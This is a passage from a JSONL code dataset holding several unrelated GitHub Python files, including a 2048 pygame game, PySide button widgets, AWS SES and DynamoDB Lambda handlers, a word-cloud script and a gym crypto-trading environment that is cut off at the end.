_make_upproj_layer(self, block, in_channels, out_channels, batch_size):\r\n return block(in_channels, out_channels, batch_size)\r\n\r\n def forward(self, x):\r\n x = self.resNet50(x)\r\n\r\n x = self.conv1(x)\r\n x = self.bn1(x)\r\n\r\n x = self.up1(x)\r\n x = self.up2(x)\r\n x = self.up3(x)\r\n x = self.up4(x)\r\n\r\n x = self.drop(x)\r\n\r\n x = self.conv2(x)\r\n x = self.relu(x)\r\n\r\n x = self.upsample(x)\r\n\r\n return x\r\n\r\n# from torchsummary import summary\r\n# 测试网络模型\r\n\r\n\r\nif __name__ == '__main__':\r\n batch_size = 1\r\n net = FCRN(batch_size)\r\n x = paddle.zeros(shape=[batch_size, 3, 304, 228])\r\n # print(net(x))\r\n paddle.summary(net, (1, 3, 304, 228))\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"Fleming-Sung/fcrn_paddle","sub_path":"fcrn.py","file_name":"fcrn.py","file_ext":"py","file_size_in_byte":5165,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"13103405458","text":"import os\nimport subprocess\n\n\ndef compress_pdf(input_path, output_path, quality=200):\n # Check if input file exists\n if not os.path.isfile(input_path):\n raise FileNotFoundError('Input file does not exist.')\n\n # Define the ghostscript command\n command = ['gs', '-sDEVICE=pdfwrite', '-dCompatibilityLevel=1.4', '-dPDFSETTINGS=/screen',\n f'-dNOPAUSE', '-dQUIET', '-dBATCH', f'-dDownsampleColorImages=true',\n f'-dColorImageResolution={quality}', f'-sOutputFile={output_path}', input_path]\n\n # Call the ghostscript command\n subprocess.run(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\n # Check if output file exists\n if not os.path.isfile(output_path):\n raise RuntimeError('Failed to compress PDF.')\n\n\ncompress_pdf('/Users/pradeep/Downloads/20230223211800.pdf', '/Users/pradeep/Downloads/output.pdf')","repo_name":"gpchakravarthi/kaggle_1","sub_path":"pdf/using_command_pdf.py","file_name":"using_command_pdf.py","file_ext":"py","file_size_in_byte":873,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"41286021674","text":"import speech_recognition as sr\r\n\r\nrecognizer = sr.Recognizer()\r\n\r\n # Open the microphone and start recording\r\nwith sr.Microphone() as source:\r\n print(\"Listening...\")\r\n\r\n try:\r\n # Adjust for ambient noise and listen for speech\r\n recognizer.adjust_for_ambient_noise(source, duration=1)\r\n audio = recognizer.listen(source, timeout=5)\r\n print(\"Audio recorded successfully. Recognizing...\")\r\n\r\n # Use Google Web Speech API for recognition\r\n recognized_text = recognizer.recognize_google(audio)\r\n print(\"You said: \" + recognized_text)\r\n\r\n except sr.WaitTimeoutError:\r\n print(\"No speech detected\")\r\n except sr.RequestError as e:\r\n print(\"Could not request results from Google Web Speech API; {0}\".format(e))\r\n except sr.UnknownValueError:\r\n print(\"Google Web Speech API could not understand audio\")\r\n","repo_name":"import-hardik/aisupport.ioGEN2","sub_path":"Python/speechtotext.py","file_name":"speechtotext.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"32297464766","text":"class Person:\n def __init__(self, param_name):\n self.name = param_name\n\n def talk(self):\n self.talk = print(\"Hi! My name is\", self.name, \"~~!\")\n\nperson_1 = Person(\"A\")\nprint(person_1.name)\nperson_2 = Person(\"B\")\nprint(person_2.name)\n\nperson_1.talk()\nperson_2.talk()","repo_name":"Sang-Gi/algorithm","sub_path":"sparta/week_2/00_study_class.py","file_name":"00_study_class.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70408462885","text":"import os\nimport random\nimport itertools\n\nimport pygame as pg\n\n\nos.environ[\"SDL_VIDEO_CENTERED\"] = \"1\"\npg.init()\n\n\nBOARD_SIZE = 4 # length n either direction\nTILE_SIZE = 100\nGAP_WIDTH = 10\nBACKGROUND_PATTERN_OVERSIZE = 4\nSMALLER_MARGIN = GAP_WIDTH - BACKGROUND_PATTERN_OVERSIZE // 2\nSCREEN_SIZE = (TILE_SIZE * BOARD_SIZE\n + GAP_WIDTH * 2\n + GAP_WIDTH * (BOARD_SIZE - 1))\nscreen = pg.display.set_mode((SCREEN_SIZE, SCREEN_SIZE))\nFONT_SIZE = 30\nFONT = pg.font.SysFont(\"Comic Sans MS\", FONT_SIZE)\nCHANCE_OF_2 = 0.9\nBACKGROUND_COLOR = (150, 150, 150)\nBACKGROUND_PATTERN_COLOR = [200, 200, 200]\nFONT_COLOR = (255, 255, 255)\nTILE_COLORS = {\n 2: (188, 32, 223),\n 4: (128, 32, 223),\n 8: (70, 32, 223),\n 16: (32, 51, 223),\n 32: (32, 108, 223),\n 64: (32, 166, 223),\n 128: (32, 223, 223),\n 256: (32, 223, 166),\n 512: (32, 223, 108),\n 1024: (32, 223, 51),\n 2048: (70, 223, 32),\n 4096: (128, 223, 32),\n 8192: (185, 223, 32),\n 16384: (223, 204, 32),\n 32768: (223, 147, 32),\n 65536: (223, 89, 32),\n 131072: (223, 32, 32)\n}\nDIRECTIONS = {\n pg.K_LEFT: \"left\",\n pg.K_RIGHT: \"right\",\n pg.K_UP: \"up\",\n pg.K_DOWN: \"down\"\n}\nDIRECTION_ROTATIONS = { # How many times to rotate depending on move direction.\n \"left\": 0,\n \"up\": 1,\n \"right\": 2,\n \"down\": 3\n}\nTILE_SURFACES = {}\nfor p in range(1, 18):\n value = 2**p\n surface = pg.Surface((TILE_SIZE, TILE_SIZE))\n color = TILE_COLORS[value]\n surface.fill(color)\n text_surface = FONT.render(str(value), True, FONT_COLOR, color)\n text_rect = text_surface.get_rect()\n text_rect.center = surface.get_rect().center\n surface.blit(text_surface, text_rect)\n TILE_SURFACES[value] = surface\nboard_coordinates = list(itertools.product(range(BOARD_SIZE), repeat=2))\nbackground = pg.Surface((SCREEN_SIZE, SCREEN_SIZE))\nbackground.fill(BACKGROUND_COLOR)\nfor x, y in board_coordinates:\n pg.draw.rect(\n background,\n BACKGROUND_PATTERN_COLOR,\n pg.Rect(\n SMALLER_MARGIN + (TILE_SIZE + GAP_WIDTH) * x,\n SMALLER_MARGIN + (TILE_SIZE + GAP_WIDTH) * y,\n TILE_SIZE + BACKGROUND_PATTERN_OVERSIZE,\n TILE_SIZE + BACKGROUND_PATTERN_OVERSIZE\n )\n )\n\n\nclass Game:\n def __init__(self):\n self.running = True\n self.clock = pg.time.Clock()\n self.new_game()\n\n def new_game(self):\n self.board = [[0 for y in range(BOARD_SIZE)] for x in range(BOARD_SIZE)]\n self.new_tile()\n self.new_tile()\n self.game_over = False\n\n def run(self):\n while self.running:\n self.clock.tick(30)\n self.detect_loss()\n self.handle_input()\n self.draw()\n\n def new_tile(self, x=None, y=None, value=None):\n if x is None and y is None:\n while True:\n x = random.choice(range(BOARD_SIZE))\n y = random.choice(range(BOARD_SIZE))\n if self.board[x][y] == 0:\n break\n if value is not None:\n value = value\n else:\n value = 2 if random.random() < CHANCE_OF_2 else 4\n self.board[x][y] = value\n\n def detect_loss(self):\n \"\"\"Scan the board and see if the player lost the game.\n If the board is full: for every tile: is there at least one\n neighbor with the same value so it can merge?\n \"\"\"\n for x, y in board_coordinates:\n value = self.board[x][y]\n if value == 0:\n return\n neighbor_coordinates = (\n (x - 1, y),\n (x + 1, y),\n (x, y - 1),\n (x, y + 1)\n )\n for nx, ny in neighbor_coordinates:\n if 0 <= nx < BOARD_SIZE and 0 <= ny < BOARD_SIZE \\\n and self.board[nx][ny] == value:\n return\n self.game_over = True\n\n def handle_input(self):\n for e in pg.event.get():\n if e.type == pg.QUIT:\n self.running = False\n elif e.type == pg.KEYDOWN:\n if e.key == pg.K_ESCAPE:\n self.running = False\n elif e.key in DIRECTIONS and not self.game_over:\n self.move_tiles(DIRECTIONS[e.key])\n elif e.key == pg.K_n:\n self.new_game()\n\n def rotate_board(self, n):\n \"\"\"Rotate the board n times 90° counterclockwise.\"\"\"\n for _ in range(n):\n self.board = list(zip(*self.board[::-1]))\n self.board = [list(column) for column in self.board]\n\n def move_tiles(self, direction):\n n_rotations = DIRECTION_ROTATIONS[direction]\n self.rotate_board(n_rotations)\n\n locked_positions = set() # cannot merge in this frame\n spawn_new = False\n something_changed = True\n while something_changed:\n something_changed = False\n for y in range(BOARD_SIZE):\n for x in range(1, BOARD_SIZE):\n value = self.board[x][y]\n if value == 0:\n continue\n left_x = x -1\n if (left_x, y) in locked_positions:\n continue\n if self.board[left_x][y] == 0:\n self.board[left_x][y] = value\n self.board[x][y] = 0\n something_changed = True\n spawn_new = True\n elif self.board[left_x][y] == value:\n self.board[left_x][y] = value * 2\n locked_positions.add((left_x, y))\n self.board[x][y] = 0\n something_changed = True\n spawn_new = True\n\n self.rotate_board(4 - n_rotations) # rotate to original orientation\n if spawn_new:\n self.new_tile()\n\n def draw(self):\n screen.blit(background, (0, 0))\n\n for x, y in board_coordinates:\n if self.board[x][y] > 0:\n position = (\n GAP_WIDTH + (TILE_SIZE + GAP_WIDTH) * x,\n GAP_WIDTH + (TILE_SIZE + GAP_WIDTH) * y\n )\n screen.blit(TILE_SURFACES[self.board[x][y]], position)\n\n pg.display.update()\n\n\nGame().run()\n","repo_name":"Farbfetzen/2048","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"30662670980","text":"from avx.devices.net.atem.constants import VideoSource\nfrom PySide.QtGui import QLabel, QToolButton, QSizePolicy, QVBoxLayout, QImage,\\\n QPainter, QPixmap, QIcon\nfrom PySide.QtCore import Qt, QSize, Signal, QEvent, QTimer\nfrom PySide.QtSvg import QSvgRenderer\n\nimport time\n\n\nclass DebouncedButtonMixin(object):\n DEBOUNCE_DELAY = 0.25\n\n def __init__(self, *args, **kwargs):\n super(DebouncedButtonMixin, self).__init__(*args, **kwargs)\n self._lastClick = time.time()\n\n def event(self, evt):\n if evt.type() == QEvent.MouseButtonRelease:\n now = time.time()\n if now - self._lastClick < self.DEBOUNCE_DELAY:\n evt.ignore()\n self.setDown(False)\n return True\n else:\n self._lastClick = now\n return super(DebouncedButtonMixin, self).event(evt)\n\n\nclass LongPressButtonMixin(object):\n longpress = Signal()\n\n def __init__(self, *args, **kwargs):\n super(LongPressButtonMixin, self).__init__(*args, **kwargs)\n self.grabGesture(Qt.TapAndHoldGesture)\n self._has_longpressed = False\n\n def event(self, evt):\n if evt.type() == QEvent.Gesture and self.isEnabled():\n gesture = evt.gesture(Qt.TapAndHoldGesture)\n if gesture:\n if gesture.state() == Qt.GestureState.GestureFinished:\n self.longpress.emit()\n self._has_longpressed = True\n return True\n elif evt.type() == QEvent.MouseButtonPress:\n self._has_longpressed = False\n elif evt.type() == QEvent.MouseButtonRelease:\n if self._has_longpressed:\n evt.ignore()\n self.setDown(False)\n return True\n return super(LongPressButtonMixin, self).event(evt)\n\n\nclass ExpandingButton(DebouncedButtonMixin, QToolButton):\n\n def __init__(self, parent=None):\n super(ExpandingButton, self).__init__(parent)\n self.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)\n self.setIconSize(QSize(48, 48))\n self.setFocusPolicy(Qt.FocusPolicy.NoFocus)\n\n\ndef _add_line_breaks(text, every_n=10):\n if len(text) <= every_n:\n return text\n by_word = text.split(' ')\n\n lines = []\n line = ''\n while len(by_word) > 0:\n next_word = by_word.pop(0)\n if len(line) + len(next_word) + 1 > every_n:\n lines.append(line.strip())\n line = ''\n line += next_word + ' '\n lines.append(line.strip())\n\n return '\\n'.join(lines)\n\n\nclass InputButton(LongPressButtonMixin, ExpandingButton):\n\n def __init__(self, myInput, parent=None):\n super(InputButton, self).__init__(parent)\n self.setCheckable(True)\n self.setToolButtonStyle(Qt.ToolButtonStyle.ToolButtonTextUnderIcon)\n self.input = None\n self.setInput(myInput)\n\n def setInput(self, myInput):\n if self.input:\n self.input.changedState.disconnect(self._update_from_input)\n self.input = myInput\n if self.input:\n self.input.changedState.connect(self._update_from_input)\n self._update_from_input()\n else:\n self.setIcon(QIcon())\n self.setText(\"Extras\")\n\n def _update_from_input(self):\n self.setText(_add_line_breaks(self.input.label))\n if self.input.icon:\n self.setIcon(self.input.icon)\n else:\n self.setIcon(QIcon())\n\n self.setProperty(\"isLive\", self.input.isLive)\n self.setProperty(\"isPreview\", self.input.isPreview)\n\n self.style().unpolish(self)\n self.style().polish(self)\n\n\nclass FlashingInputButton(InputButton):\n def __init__(self, myInput, parent=None):\n super(FlashingInputButton, self).__init__(myInput, parent)\n self.flashing = False\n self._flashState = 0\n self._timer = QTimer()\n self._timer.timeout.connect(self._flash)\n self._timer.start(500)\n\n def setFlashing(self, flashing):\n self.flashing = flashing\n\n def _flash(self):\n if self.flashing and self._flashState == 0:\n self._flashState = 1\n self.setProperty(\"flashing\", True)\n elif self.property(\"flashing\"):\n self._flashState = 0\n self.setProperty(\"flashing\", False)\n self.style().unpolish(self)\n self.style().polish(self)\n\n\nclass IDedButton(ExpandingButton):\n\n def __init__(self, ID, parent=None):\n super(IDedButton, self).__init__(parent)\n self.ID = ID\n\n\nclass OutputButton(LongPressButtonMixin, ExpandingButton):\n\n def __init__(self, myOutput, parent=None):\n super(OutputButton, self).__init__(parent)\n self.setToolButtonStyle(Qt.ToolButtonStyle.ToolButtonIconOnly) # Sneakily hide our actual text\n\n self.textDisplay = QLabel()\n self.stateDisplay = QLabel()\n layout = QVBoxLayout()\n layout.addWidget(self.textDisplay)\n layout.addWidget(self.stateDisplay)\n\n self.textDisplay.setObjectName(\"textDisplay\")\n\n self.stateDisplay.setObjectName(\"stateDisplay\")\n self.stateDisplay.setAlignment(Qt.AlignHCenter)\n\n self.setLayout(layout)\n\n self.output = myOutput\n self.output.changedState.connect(self._update_from_output)\n self._update_from_output()\n\n def _update_from_output(self):\n self.setText(self.output.label)\n\n if self.output.source and hasattr(self.output.source, \"label\"):\n self.stateDisplay.setText(self.output.source.label)\n self.stateDisplay.setProperty(\"highlight\", (self.output.source.source != VideoSource.ME_1_PROGRAM))\n else:\n self.stateDisplay.setText(\"-\")\n self.stateDisplay.setProperty(\"highlight\", False)\n self.stateDisplay.style().unpolish(self.stateDisplay)\n self.stateDisplay.style().polish(self.stateDisplay)\n\n def setText(self, text):\n self.textDisplay.setText(text)\n super(OutputButton, self).setText(text)\n\n\nclass OptionButton(ExpandingButton):\n\n def __init__(self, parent=None):\n super(OptionButton, self).__init__(parent)\n self.setCheckable(True)\n self.setToolButtonStyle(Qt.ToolButtonStyle.ToolButtonTextBesideIcon)\n\n\nclass SvgButton(ExpandingButton):\n def __init__(self, svgImage, width, height, parent=None):\n super(SvgButton, self).__init__(parent)\n svg_renderer = QSvgRenderer(svgImage)\n image = QImage(width, height, QImage.Format_ARGB32)\n # Set the ARGB to 0 to prevent rendering artifacts\n image.fill(0x00000000)\n svg_renderer.render(QPainter(image))\n pixmap = QPixmap.fromImage(image)\n icon = QIcon(pixmap)\n self.setIcon(icon)\n self.setIconSize(QSize(width, height))\n","repo_name":"staldates/av-control","sub_path":"src/staldates/ui/widgets/Buttons.py","file_name":"Buttons.py","file_ext":"py","file_size_in_byte":6785,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"18151919537","text":"import os\nfrom typing import Tuple\n\nimport boto3\nfrom botocore.exceptions import ClientError\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\nAWS_REGION = 'eu-west-1'\n\n\ndef handler(event, context):\n subject, message = parse_params(event, context)\n sender = os.getenv('SENDER_EMAIL')\n recipient = os.getenv('RECIPIENT_EMAIL')\n send_email(subject, message, sender, recipient)\n\n\ndef parse_params(event, _) -> Tuple[str, str]:\n data = event['body']\n if 'subject' not in data:\n raise Exception('\"subject\" param is required')\n if 'message' not in data:\n raise Exception('\"message\" param is required')\n return data['subject'], data['message']\n\n\ndef send_email(subject: str, message: str, sender: str, recipient: str):\n client = boto3.client('ses', region_name=AWS_REGION)\n try:\n response = client.send_email(\n Destination={\n 'ToAddresses': [recipient],\n },\n Message={\n 'Body': {\n 'Text': {\n 'Charset': 'UTF-8',\n 'Data': message,\n },\n },\n 'Subject': {\n 'Charset': 'UTF-8',\n 'Data': subject,\n },\n },\n Source=sender,\n )\n\n except ClientError as e:\n raise Exception(e.response['Error']['Message'])\n\n else:\n print(f\"Email sent! Message ID: {response['MessageId']}\")\n","repo_name":"bertini36/serverless-notifications-sender","sub_path":"sender.py","file_name":"sender.py","file_ext":"py","file_size_in_byte":1481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"25914277781","text":"import wordcloud\r\nfrom matplotlib import pyplot as plt\r\n\r\n\r\ndef upload():\r\n text_file = open(\"Word.txt\", 'r')\r\n data = text_file.read()\r\n text_file.close()\r\n return data\r\n\r\n\r\ndef calculate_frequencies(file_contents):\r\n # Here is a list of punctuations and uninteresting words you can use to process your text\r\n punctuations = '''!()-[]{};:'\"\\,<>./?@#$%^&*_~'''\r\n uninteresting_words = [\"the\", \"a\", \"to\", \"if\", \"is\", \"it\", \"of\", \"and\", \"or\", \"an\", \"as\", \"i\", \"me\", \"my\", \"we\", \"our\",\r\n \"ours\", \"you\", \"your\", \"yours\", \"he\", \"she\", \"him\", \"his\", \"her\", \"hers\", \"its\",\"they\", \"them\",\r\n \"their\", \"what\", \"which\", \"who\", \"whom\", \"this\", \"that\", \"am\", \"are\", \"was\", \"were\", \"be\",\r\n \"been\", \"being\", \"have\", \"has\", \"had\", \"do\", \"does\", \"did\", \"but\", \"at\", \"by\", \"with\", \"from\",\r\n \"here\", \"when\", \"where\", \"how\", \"all\", \"any\", \"both\", \"each\", \"few\", \"more\", \"some\", \"such\",\r\n \"no\", \"nor\", \"too\", \"very\",\"can\", \"will\", \"just\"]\r\n\r\n # LEARNER CODE START HERE\r\n word_lst = file_contents.lower().split() # splits the string into a list\r\n new_wrd_lst = [] # empty list that will contain only interesting words\r\n for word in word_lst: # iterate through our word list\r\n if word not in uninteresting_words and word not in punctuations and word.isalpha() == True: # checks if word has uninteresting word in it\r\n new_wrd_lst.append(word) # if not then appends the word to our empty list\r\n frequencies = {} # an empty dictionary\r\n for word in new_wrd_lst: # iterating through the list\r\n count = 0\r\n for wrd in new_wrd_lst: # nested loop for comparison\r\n if word == wrd: # comparing if the word is same\r\n count += 1 # counting the number of time the word came\r\n frequencies[word] = count\r\n # wordcloud\r\n cloud = wordcloud.WordCloud()\r\n cloud.generate_from_frequencies(frequencies)\r\n return cloud.to_array()\r\n\r\n\r\n# Display your wordcloud image\r\n\r\nmyimage = calculate_frequencies(upload())\r\nplt.imshow(myimage, interpolation='nearest')\r\nplt.axis('off')\r\nplt.show()\r\n","repo_name":"ayushjaswal/Word-Cloud-","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"9534082207","text":"import json\nfrom boto3 import resource\nfrom boto3.dynamodb.conditions import Key\ndynamodb_resource = resource('dynamodb')\n\ndef lambda_handler(event, context):\n \n result=''\n session_key =abs(hash(event['email']))\n event['session_key'] = str(session_key)\n table = dynamodb_resource.Table('user')\n if( read_table_item(table , 'email', event['email']) > 1):\n return {\n \"status\" :\"exists\",\n \"sessionkey\":\"\",\n \"email\":\"\",\n \"usercreated\":\"false\"\n \n }\n else:\n add_item(table,event)\n return {\n \"status\" :\"success\",\n \"sessionkey\":session_key,\n \"email\":event['email'],\n \"usercreated\":\"true\"\n }\n\n\n\ndef read_table_item(table, pk_name, pk_value):\n \n response = table.get_item(Key={pk_name: pk_value})\n return len(response)\n \ndef add_item(table, col_dict):\n response = table.put_item(Item=col_dict)\n return response","repo_name":"Sasikumar3096/Profiza-interview-activity","sub_path":"Functions/create_account.py","file_name":"create_account.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"1319446205","text":"import multiprocessing\nimport time\n\nsquare=[]\ncube=[]\n\ndef calc_square(numbers):\n global square\n for n in numbers:\n time.sleep(60)\n square.append(n*n) \n print(square)\n \ndef calc_cube(numbers):\n global cube\n for n in numbers:\n time.sleep(60)\n cube.append(n*n*n) \n \nif __name__ == '__main__':\n arr=[3,4,5,6]\n p1=multiprocessing.Process(target=calc_square, args=(arr,))\n p2=multiprocessing.Process(target=calc_cube, args=(arr,))\n \n p1.start() \n p2.start()\n \n p1.join()\n p2.join()\n \n print(square)\n print(cube)\n print('multiprocess completed..!')\n\nprint(square)\nprint(cube)\n\n ","repo_name":"learningpath17/PYTHON_AUG2020","sub_path":"24.Multiprocessing.py","file_name":"24.Multiprocessing.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"29070373902","text":"\"\"\"Gym enrivornment to simulate trading operations with multi pairs.\n\nThis environment use an array rank 1 with 220 items as it's observations space.\n\nLucas Draichi\n2019\n\"\"\"\n\nimport random\nimport json\nimport gym\nfrom gym import spaces\nfrom configs.vars import LOOKBACK_WINDOW_SIZE, INITIAL_ACCOUNT_BALANCE, COMMISSION\nimport pandas as pd\nimport numpy as np\nfrom termcolor import colored\nimport colorama\ncolorama.init()\nfrom env.MultiModelRenderRank1V2 import StockTradingGraph\n# from env.MultiModelRenderRank1 import StockTradingGraph\n\nclass TradingEnv(gym.Env):\n \"\"\"A stock trading environment for OpenAI gym\"\"\"\n # metadata = {'render.modes': ['live', 'file', 'none']}\n visualization = None\n\n def __init__(self, config):\n # print(config)\n self.df1 = config['df1']\n self.df1_features = self.df1.loc[: , self.df1.columns != 'Date']\n self.df2 = config['df2']\n self.df2_features = self.df2.loc[: , self.df2.columns != 'Date']\n self.df3 = config['df3']\n self.df3_features = self.df3.loc[: , self.df3.columns != 'Date']\n self.render_title = config['render_title']\n self.histo = config['histo']\n self.s1, self.s2, self.s3 = config['s1'], config['s2'], config['s3']\n self.trade_instrument = config['trade_instrument']\n self.lookback_window_size = LOOKBACK_WINDOW_SIZE\n self.initial_balance = INITIAL_ACCOUNT_BALANCE\n self.commission = COMMISSION\n self.serial = False\n self.action_space = spaces.Box(\n low=np.array([0, 0]),\n high=np.array([7, 1]), # buy and sell each of these 3 coins and hold position = 7 posible actions\n dtype=np.float16)\n self.observation_space = spaces.Box(\n low=-np.finfo(np.float32).max,\n high=np.finfo(np.float32).max,\n shape=(len(self.df1_features.columns) * 3 + 13, ), # shape = 3 dfs * len(df) + obs variables\n dtype=np.float16)\n\n def _next_observation(self):\n frame1 = np.array(self.df1_features.values[self.current_step])\n frame2 = np.array(self.df2_features.values[self.current_step])\n frame3 = np.array(self.df3_features.values[self.current_step])\n # frame = frame1 + frame2 + frame3\n frame = np.concatenate((frame1, frame2, frame3))\n # print('============ \\n',len(frame))\n # print(frame)\n obs = np.append(frame, [\n [self.balance],\n [self.shares1_bought],\n [self.shares2_bought],\n [self.shares3_bought],\n [self.shares1_sold],\n [self.shares2_sold],\n [self.shares3_sold],\n [self.shares1_held],\n [self.shares2_held],\n [self.shares3_held],\n [self.cost],\n [self.sales],\n [self.net_worth]\n ])\n # print('============ \\n',len(self.df1_features.columns) * 3 + 13)\n # print('\\n', len(obs))\n # print(obs)\n # print('==============\\n')\n return obs\n\n def _take_action(self, action):\n current_price1 = random.uniform(\n self.df1_features.loc[self.current_step, \"open\"], self.df1_features.loc[self.current_step, \"close\"])\n current_price2 = random.uniform(\n self.df2_features.loc[self.current_step, \"open\"], self.df2_features.loc[self.current_step, \"close\"])\n current_price3 = random.uniform(\n self.df3_features.loc[self.current_step, \"open\"], self.df3_features.loc[self.current_step, \"close\"])\n\n action_type = action[0]\n amount = action[1]\n\n if 0 < amount <= 1 and action_type > 0: # bounds of action_space doesn't seem to work, so this line is necessary to not overflow actions\n\n self.shares1_bought = 0\n self.shares2_bought = 0\n self.shares3_bought = 0\n self.shares1_sold = 0\n self.shares2_sold = 0\n self.shares3_sold = 0\n self.cost = 0\n self.sales = 0\n\n # buy shares1\n if action_type < 1 and self.balance >= self.balance * amount * (1 + self.commission): # check if has enough money to trade\n self.shares1_bought = self.balance * amount / current_price1\n self.cost = self.shares1_bought * current_price1 * (1 + self.commission)\n self.shares1_held += self.shares1_bought\n self.balance -= self.cost\n # sell shares1\n elif action_type < 2:\n self.shares1_sold = self.shares1_held * amount\n self.sales = self.shares1_sold * current_price1 * (1 - self.commission)\n self.shares1_held -= self.shares1_sold\n self.balance += self.sales\n\n # buy shares 2\n elif action_type < 3 and self.balance >= self.balance * amount * (1 + self.commission): # check if has enough money to trade\n self.shares2_bought = self.balance * amount / current_price2\n self.cost = self.shares2_bought * current_price2 * (1 + self.commission)\n self.shares2_held += self.shares2_bought\n self.balance -= self.cost\n # sell shares 2\n elif action_type < 4:\n self.shares2_sold = self.shares2_held * amount\n self.sales = self.shares2_sold * current_price2 * (1 - self.commission)\n self.shares2_held -= self.shares2_sold\n self.balance += self.sales\n\n # buy shares 3\n elif action_type < 5 and self.balance >= self.balance * amount * (1 + self.commission): # check if has enough money to trade\n self.shares3_bought = self.balance * amount / current_price3\n self.cost = self.shares3_bought * current_price3 * (1 + self.commission)\n self.shares3_held += self.shares3_bought\n self.balance -= self.cost\n # sell shares 3\n elif action_type < 6:\n self.shares3_sold = self.shares3_held * amount\n self.sales = self.shares3_sold * current_price3 * (1 - self.commission)\n self.shares3_held -= self.shares3_sold\n self.balance += self.sales\n\n if self.shares1_sold > 0 or self.shares1_bought > 0:\n # only print in rollout mode\n # print(colored('{} BTC {} USDT - holding: {} BTC balance {} USDT'.format(self.shares1_bought, self.cost if self.shares1_bought > 0 else self.sales, self.shares1_held, self.balance), 'green' if self.shares1_bought > 0 else 'red'))\n self.trades1.append({'step': self.current_step,\n 'amount': self.shares1_sold if self.shares1_sold > 0 else self.shares1_bought, 'total': self.sales if self.shares1_sold > 0 else self.cost,\n 'type': \"sell\" if self.shares1_sold > 0 else \"buy\"})\n if self.shares2_sold > 0 or self.shares2_bought > 0:\n # print(colored('{} ETH {} USDT - holding {} ETH balance: {} USDT'.format(self.shares2_bought, self.cost if self.shares2_bought > 0 else self.sales, self.shares2_held, self.balance), 'green' if self.shares2_bought > 0 else 'red'))\n self.trades2.append({'step': self.current_step,\n 'amount': self.shares2_sold if self.shares2_sold > 0 else self.shares2_bought, 'total': self.sales if self.shares2_sold > 0 else self.cost,\n 'type': \"sell\" if self.shares2_sold > 0 else \"buy\"})\n if self.shares3_sold > 0 or self.shares3_bought > 0:\n # print(colored('{} LTC {} USDT - holding {} LTC balance: {} USDT'.format(self.shares3_bought, self.cost if self.shares3_bought > 0 else self.sales, self.shares3_held, self.balance), 'green' if self.shares3_bought > 0 else 'red'))\n self.trades3.append({'step': self.current_step,\n 'amount': self.shares3_sold if self.shares3_sold > 0 else self.shares3_bought, 'total': self.sales if self.shares3_sold > 0 else self.cost,\n 'type': \"sell\" if self.shares3_sold > 0 else \"buy\"})\n\n self.net_worth = self.balance + (self.shares1_held * current_price1) + (self.shares2_held * current_price2) + (self.shares3_held * current_price3)\n self.buy_and_hold = self.initial_bought1 * current_price1 + self.initial_bought2 * current_price2 + self.initial_bought3 * current_price3\n\n def step(self, action):\n # Execute one time step within the environment\n self._take_action(action)\n self.current_step += 1\n\n net_worth_and_buyhold_mean = (self.net_worth + self.buy_and_hold) / 2\n reward = (self.net_worth - self.buy_and_hold) / net_worth_and_buyhold_mean\n done = self.net_worth <= 0 or self.balance <= 0 or self.current_step >= len(self.df1_features.loc[:, 'open'].values) -1\n obs = self._next_observation()\n\n return obs, reward, done, {}\n\n def reset(self):\n # Reset the state of the environment to an initial state\n self.balance = INITIAL_ACCOUNT_BALANCE\n self.net_worth = INITIAL_ACCOUNT_BALANCE\n self.shares1_held = 0\n self.shares2_held = 0\n self.shares3_held = 0\n self.shares1_bought = 0\n self.shares2_bought = 0\n self.shares3_bought = 0\n self.shares1_sold = 0\n self.shares2_sold = 0\n self.shares3_sold = 0\n self.cost = 0\n self.sales = 0\n self.current_step = 0\n self.first_price1 = self.df1_features[\"close\"][0]\n self.first_price2 = self.df2_features[\"close\"][0]\n self.first_price3 = self.df3_features[\"close\"][0]\n self.initial_bought1 = 1/3 * self.initial_balance / self.first_price1\n self.initial_bought2 = 1/3 * self.initial_balance / self.first_price2\n self.initial_bought3 = 1/3 * self.initial_balance / self.first_price3\n self.trades1 = []\n self.trades2 = []\n self.trades3 = []\n\n return self._next_observation()\n\n def _render_to_file(self, filename='render.txt'):\n profit = self.net_worth - INITIAL_ACCOUNT_BALANCE\n\n file = open(filename, 'a+')\n\n file.write('Step: {}\\n'.format(self.current_step))\n file.write('Balance: {}\\n'.format(self.balance))\n file.write('Shares1 held: {}\\n'.format(self.shares1_held))\n file.write('Shares2 held: {}\\n'.format(self.shares2_held))\n file.write('Shares3 held: {}\\n'.format(self.shares3_held))\n file.write('Avg cost for held shares: {}\\n'.format(self.cost))\n file.write('Net worth: {}\\n'.format(self.net_worth))\n file.write('Buy and hold strategy: {}\\n'.format(self.buy_and_hold))\n file.write('Profit: {}\\n\\n'.format(profit))\n\n file.close()\n\n def render(self, mode='live', **kwargs):\n # Render the environment to the screen\n if mode == 'file':\n self._render_to_file(kwargs.get('filename', 'render.txt'))\n\n elif mode == 'live':\n if self.visualization == None:\n self.visualization = StockTradingGraph(self.df1,\n self.df2,\n self.df3,\n self.render_title,\n self.histo,\n self.s1,\n 